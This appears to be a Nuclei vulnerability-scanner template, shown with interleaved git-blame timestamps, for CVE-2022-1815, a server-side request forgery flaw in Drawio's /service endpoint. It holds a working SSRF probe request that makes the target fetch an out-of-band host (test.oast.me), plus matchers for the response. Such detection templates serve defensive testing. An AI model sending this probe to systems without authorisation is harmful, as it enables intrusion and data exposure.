2022-07-29 12:55:26 +00:00
id : CVE-2022-1815
info :
2023-04-07 15:22:59 +00:00
name : Drawio <18.1.2 - Server-Side Request Forgery
2022-07-29 12:55:26 +00:00
author : amit-jd
2022-07-29 15:56:00 +00:00
severity : high
2022-07-29 14:05:15 +00:00
description : |
2023-04-07 16:32:17 +00:00
Drawio before 18.1.2 is susceptible to server-side request forgery via the /service endpoint in jgraph/drawio. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
2022-07-29 12:55:26 +00:00
reference :
- https://huntr.dev/bounties/6e856a25-9117-47c6-9375-52f78876902f/
2022-07-29 15:56:00 +00:00
- https://huntr.dev/bounties/6e856a25-9117-47c6-9375-52f78876902f
- https://github.com/jgraph/drawio/commit/c287bef9101d024b1fd59d55ecd530f25000f9d8
2023-04-07 15:22:59 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-1815
2022-07-29 15:56:00 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cve-id : CVE-2022-1815
cwe-id : CWE-918
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:diagrams:drawio:*:*:*:*:*:*:*:*
epss-score : 0.0061
2022-07-29 14:28:11 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2022-07-29 15:56:00 +00:00
verified : "true"
2022-08-27 04:41:18 +00:00
tags : huntr,cve,cve2022,drawio,ssrf,oast,oss,jgraph
2022-07-29 12:55:26 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-07-29 12:55:26 +00:00
- raw :
- |
2022-07-29 15:40:00 +00:00
GET /service/0/test.oast.me HTTP/2
2022-07-29 12:55:26 +00:00
Host : {{Hostname}}
matchers :
2022-07-29 15:40:00 +00:00
- type : dsl
dsl :
- "contains(body, 'Interactsh Server')"
- status_code == 200
condition : and
2023-04-07 15:22:59 +00:00
# Enhanced by md on 2023/04/07